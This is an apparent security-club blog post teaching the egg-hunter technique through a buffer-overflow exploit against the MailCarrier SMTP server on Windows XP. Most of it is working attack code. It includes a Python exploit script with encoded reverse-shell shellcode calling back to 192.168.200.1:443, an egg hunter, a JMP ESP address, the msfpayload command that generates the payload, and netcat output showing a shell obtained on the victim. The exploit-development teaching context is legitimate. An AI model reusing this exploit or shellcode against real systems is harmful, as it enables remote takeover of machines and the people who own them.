This month was the 5th meeting of the Offensive Security Ohio Chapter.  I had the pleasure assisting the instruction of this class with Rob Simon (@Kickenchicken57, http://www.kc57.com).  Rob took us through an explanation of an exploit development technique called Egg Hunting.  The technique builds off of our previous example of an EIP/ESP overwrite, but this time, we don’t have enough room to store our “evil” shell code in ESP.  So, we drop what’s called an “Egg Hunter” in ESP, which will search the memory stack for our “evil” shell code and execute it.

Let’s start with the iteration of our MailCarrier exploit, where we filled our initial buffer with all A’s, the EIP with B’s, and the ESP with C’s.

#!/usr/bin/python
import socket

# create a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# our buffer overflow
buffer = "A" * 5093 # pattern offset value

# our EIP overwrite
buffer += "B" * 4

# our ESP overwrite
buffer += "C" * 403

try:
 print "\nSending evil buffer..."
 s.connect(('192.168.200.128', 25))
 s.send('EHLO ' + buffer + '\r\n')
 data = s.recv(1024)
 s.close()
except:
 print "Could not connect to SMTP!"

We’re going to pretend that we don’t have 403 bytes in ESP for our “evil” shell code, and actually place our shell code where our A’s are currently being written.  We will still need to overwrite our EIP register with our “JMP ESP” memory address from the last example to replace the B’s.  And finally, we will put our Egg Hunter where our C’s are currently being written.

In the past two classes, we have had some problems generating reliable exploit shell code using MSFPAYLOAD/MSFENCODE.  I’m confident that the issue is that we are not excluding all of the “Bad Characters” required for the payload to successfully execute.  I cannot find any good references to “all” bad characters that should be excluded, but I have found that reliable code can be generated by using the “x86/alpha_upper” encoder.  The downside is that the payload is twice as large.  So, let’s generate our new shell code that is guaranteed to work, which we will place within our A’s in our exploit code using the following command line:

msfpayload windows/shell_reverse_tcp LHOST=192.168.200.1 LPORT=443 R | msfencode -e x86/alpha_upper -t c

For the EIP overwrite, you should use the same address that you used in the previous exploit to replace the B’s in our code.

And finally, the C’s will be overwritten by our Egg Hunter.  There is an excellent technical writeup on how Egg Hunters actually work here.  The Egg Hunter code was taken from here.  We are using the NtDisplayString Egg Hunter, which is only 32 bytes in size.  Here is the final code:

#!/usr/bin/python
import socket
import struct

# create a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# evil shell code - reverse shell to 192.168.200.1:443
# 697 bytes
evilshell = "w00tw00t"
evilshell += ("\x89\xe5\xdd\xc6\xd9\x75\xf4\x5b\x53\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x43\x30"
"\x45\x50\x45\x50\x45\x30\x4b\x39\x5a\x45\x50\x31\x4e\x32\x52"
"\x44\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x50\x52\x54\x4c\x4c\x4b"
"\x51\x42\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x51"
"\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x47\x4c"
"\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x43\x31\x58\x47\x5a\x42\x5a\x50\x50\x52\x56\x37\x4c\x4b"
"\x56\x32\x54\x50\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c"
"\x4b\x47\x30\x43\x48\x4c\x45\x4f\x30\x54\x34\x50\x4a\x43\x31"
"\x58\x50\x50\x50\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x51\x48\x47"
"\x50\x43\x31\x49\x43\x4d\x33\x47\x4c\x47\x39\x4c\x4b\x47\x44"
"\x4c\x4b\x45\x51\x49\x46\x56\x51\x4b\x4f\x50\x31\x4f\x30\x4e"
"\x4c\x4f\x31\x58\x4f\x54\x4d\x43\x31\x58\x47\x47\x48\x4d\x30"
"\x54\x35\x4c\x34\x43\x33\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56"
"\x44\x54\x35\x5a\x42\x56\x38\x4c\x4b\x50\x58\x47\x54\x43\x31"
"\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45"
"\x4c\x43\x31\x58\x53\x4c\x4b\x54\x44\x4c\x4b\x43\x31\x4e\x30"
"\x4b\x39\x50\x44\x51\x34\x51\x34\x51\x4b\x51\x4b\x43\x51\x56"
"\x39\x51\x4a\x50\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x51\x4a"
"\x4c\x4b\x45\x42\x5a\x4b\x4c\x46\x51\x4d\x52\x48\x47\x43\x56"
"\x52\x45\x50\x43\x30\x45\x38\x43\x47\x43\x43\x56\x52\x51\x4f"
"\x51\x44\x45\x38\x50\x4c\x43\x47\x56\x46\x43\x37\x4b\x4f\x58"
"\x55\x58\x38\x5a\x30\x43\x31\x43\x30\x43\x30\x47\x59\x58\x44"
"\x50\x54\x56\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x45\x50\x4b"
"\x4f\x49\x45\x50\x50\x56\x30\x50\x50\x56\x30\x51\x50\x50\x50"
"\x51\x50\x50\x50\x52\x48\x4b\x5a\x54\x4f\x49\x4f\x4d\x30\x4b"
"\x4f\x4e\x35\x4c\x49\x58\x47\x43\x58\x49\x50\x49\x38\x58\x48"
"\x45\x51\x52\x48\x43\x32\x45\x50\x45\x51\x4f\x4b\x4c\x49\x5a"
"\x46\x43\x5a\x52\x30\x50\x56\x50\x57\x45\x38\x4d\x49\x4f\x55"
"\x43\x44\x45\x31\x4b\x4f\x4e\x35\x43\x58\x43\x53\x52\x4d\x43"
"\x54\x43\x30\x4d\x59\x4b\x53\x56\x37\x51\x47\x50\x57\x56\x51"
"\x4b\x46\x52\x4a\x54\x52\x50\x59\x56\x36\x5a\x42\x4b\x4d\x45"
"\x36\x4f\x37\x47\x34\x51\x34\x47\x4c\x43\x31\x45\x51\x4c\x4d"
"\x51\x54\x47\x54\x54\x50\x49\x56\x43\x30\x50\x44\x51\x44\x56"
"\x30\x56\x36\x51\x46\x51\x46\x51\x56\x51\x46\x50\x4e\x56\x36"
"\x56\x36\x50\x53\x56\x36\x52\x48\x52\x59\x58\x4c\x47\x4f\x4c"
"\x46\x4b\x4f\x58\x55\x4c\x49\x4b\x50\x50\x4e\x50\x56\x50\x46"
"\x4b\x4f\x56\x50\x45\x38\x45\x58\x4b\x37\x45\x4d\x45\x30\x4b"
"\x4f\x49\x45\x4f\x4b\x4c\x30\x58\x35\x49\x32\x51\x46\x52\x48"
"\x49\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x47\x4c\x54"
"\x46\x43\x4c\x45\x5a\x4d\x50\x4b\x4b\x4d\x30\x52\x55\x54\x45"
"\x4f\x4b\x47\x37\x54\x53\x54\x32\x52\x4f\x43\x5a\x43\x30\x56"
"\x33\x4b\x4f\x58\x55\x41\x41")

egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"w00t"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# A's overwite
# pattern offset value = 5093
buffer = "\x90" * 1000
buffer += evilshell
buffer += "A" * (5093 - len(evilshell) - 1000)

# EIP (B's) overwrite
# 7C941EED - JMP ESP (XP - SP2)
buffer += struct.pack('<L', 0x7C941EED)

# our ESP (C's) overwrite
# Egg Hunter
buffer += "\x90" * 16
buffer += egghunter
buffer += "C" * (403 - len(egghunter) - 16)

try:
 print "\nSending evil buffer..."
 s.connect(('192.168.200.128', 25))
 s.send('EHLO ' + buffer + '\r\n')
 data = s.recv(1024)
 s.close()
except:
 print "Could not connect to SMTP!"

Note that we started our “evilcode” variable with “w00tw00t” and there is only one “w00t” in our Egg Hunter.  Remember that the evil shell code, tagged with “w00tw00t”, and the Egg Hunter with “w00t” both reside in memory.  If the search string within the Egg Hunter was the same as the string in the evil shell code (one “w00t”), we might stumble upon the “w00t” within the Egg Hunter during our search, and fall into an endless loop.  The Egg Hunter is actually written to search memory for two consecutive instances of “w00t” before executing the shell code following the search string.

We also learned a trick this month in the EIP overwrite “struct.pack(‘<L’, 0x<memory address>)”.  This function call takes care of the Little Endian notation that we had to compensate for in our previous example.  To utilize it, we need to import the library at the beginning of our script with “import struct”.

So, lets see if our new Egg Hunter exploit works.  First we setup our netcat listener, then execute the script.

root@bt:/pentest/exploits/framework3# nc -lvp 443
listening on [any] 443 ...
192.168.200.128: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.200.1] from (UNKNOWN) [192.168.200.128] 1313
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

 Connection-specific DNS Suffix  . : localdomain
 IP Address. . . . . . . . . . . . : 192.168.200.128
 Subnet Mask . . . . . . . . . . . : 255.255.255.0
 Default Gateway . . . . . . . . . : 192.168.200.2

C:\WINDOWS\system32>

And there we have it.  Another successful remote shell on the victim!